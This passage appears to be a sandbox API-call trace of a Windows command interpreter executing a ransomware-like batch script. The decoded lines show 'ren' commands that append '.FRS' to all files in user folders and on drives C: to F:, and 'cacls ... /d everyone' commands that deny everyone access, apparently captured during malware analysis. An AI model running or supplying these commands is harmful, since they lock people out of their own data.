lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0112.337] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.337] GetFileType (hFile=0x2b8) returned 0x1 [0112.337] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0112.337] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.337] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0112.337] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 2\r\n\\\"==\\\"encrypt\\\" goto 3\r\n") returned 8 [0112.337] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0112.337] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.337] GetFileType (hFile=0x2b8) returned 0x1 [0112.337] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0112.337] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.337] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0112.337] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 2\r\n") returned 2 [0112.337] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0112.337] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.337] GetFileType (hFile=0x2b8) returned 0x1 [0112.337] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0112.337] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.337] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0112.337] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":2\r\n 2\r\n") returned 4 [0112.337] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0112.337] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.337] GetFileType (hFile=0x2b8) returned 0x1 [0112.337] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0112.337] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.337] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=196, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0112.338] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=47, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" *.*.FRS\r\n\\temp.txt\"')do set n=%%i\r\n") returned 47 [0112.338] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0112.338] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.338] GetFileType (hFile=0x2b8) returned 0x1 [0112.338] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0112.338] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.338] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0112.338] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" *.*.FRS\r\np.txt\"')do set n=%%i\r\n") returned 51 [0112.338] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0112.338] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.338] GetFileType (hFile=0x2b8) returned 0x1 [0112.338] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0112.338] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.338] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0112.338] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=45, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Links\\*.*\" *.*.FRS\r\n.FRS\r\n") returned 45 [0112.338] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0112.338] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.338] GetFileType (hFile=0x2b8) returned 0x1 [0112.338] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0112.338] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.338] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0112.338] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=49, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" *.*.FRS\r\n\r\n") returned 49 [0112.338] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0112.338] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.338] GetFileType (hFile=0x2b8) returned 0x1 [0112.338] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0112.338] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.338] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0112.338] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Searches\\*.*\" *.*.FRS\r\n\n") returned 48 [0112.338] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0112.339] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.339] GetFileType (hFile=0x2b8) returned 0x1 [0112.339] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0112.339] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.339] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=435, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0112.339] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=46, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Videos\\*.*\" *.*.FRS\r\n\r\n") returned 46 [0112.339] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0112.339] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.339] GetFileType (hFile=0x2b8) returned 0x1 [0112.339] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0112.339] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.339] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=483, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0112.339] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" *.*.FRS\r\n") returned 48 [0112.339] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0112.339] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.339] GetFileType (hFile=0x2b8) returned 0x1 [0112.339] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0112.339] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.339] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0112.339] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\Public\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 35 [0112.339] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0112.339] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.339] GetFileType (hFile=0x2b8) returned 0x1 [0112.339] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0112.339] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.339] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0112.339] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 22 [0112.339] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0112.340] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.340] GetFileType (hFile=0x2b8) returned 0x1 [0112.340] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0112.340] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.340] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=562, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0112.340] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"D:\\*.*\" *.*.FRS\r\n") returned 22 [0112.340] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0112.340] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.340] GetFileType (hFile=0x2b8) returned 0x1 [0112.340] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0112.340] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.340] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0112.340] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"E:\\*.*\" *.*.FRS\r\n") returned 22 [0112.340] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0112.340] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.340] GetFileType (hFile=0x2b8) returned 0x1 [0112.340] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0112.340] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.340] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0112.340] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"F:\\*.*\" *.*.FRS\r\n") returned 22 [0112.340] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0112.340] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.340] GetFileType (hFile=0x2b8) returned 0x1 [0112.340] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0112.341] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.341] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=669, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0112.341] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=63, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" /e /d everyone\r\net n=%%i\r\n") returned 63 [0112.341] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0112.341] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.341] GetFileType (hFile=0x2b8) returned 0x1 [0112.341] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0112.341] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.341] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0112.341] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=67, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" /e /d everyone\r\n=%%i\r\n") returned 67 [0112.341] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0112.341] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.341] GetFileType (hFile=0x2b8) returned 0x1 [0112.341] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0112.341] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.341] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0112.341] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=61, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Links\\*.*\" /e /d everyone\r\nyone\r\n") returned 61 [0112.341] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0112.341] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.341] GetFileType (hFile=0x2b8) returned 0x1 [0112.341] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0112.341] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.341] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0112.341] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=65, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" /e /d everyone\r\n\r\n") returned 65 [0112.341] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0112.341] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.341] GetFileType (hFile=0x2b8) returned 0x1 [0112.342] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0112.342] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.342] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0112.342] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Searches\\*.*\" /e /d everyone\r\n\n") returned 64 [0112.342] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0112.342] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.342] GetFileType (hFile=0x2b8) returned 0x1 [0112.342] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0112.342] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.342] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0112.342] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=62, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Videos\\*.*\" /e /d everyone\r\n\r\n") returned 62 [0112.342] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0112.342] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.342] GetFileType (hFile=0x2b8) returned 0x1 [0112.342] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0112.342] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.342] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0112.342] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" /e /d everyone\r\n") returned 64 [0112.342] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0112.342] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.342] GetFileType (hFile=0x2b8) returned 0x1 [0112.342] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0112.342] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.342] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1103, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0112.342] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\Public\\*.*\" /e /d everyone\r\n/d everyone\r\n") returned 51 [0112.342] 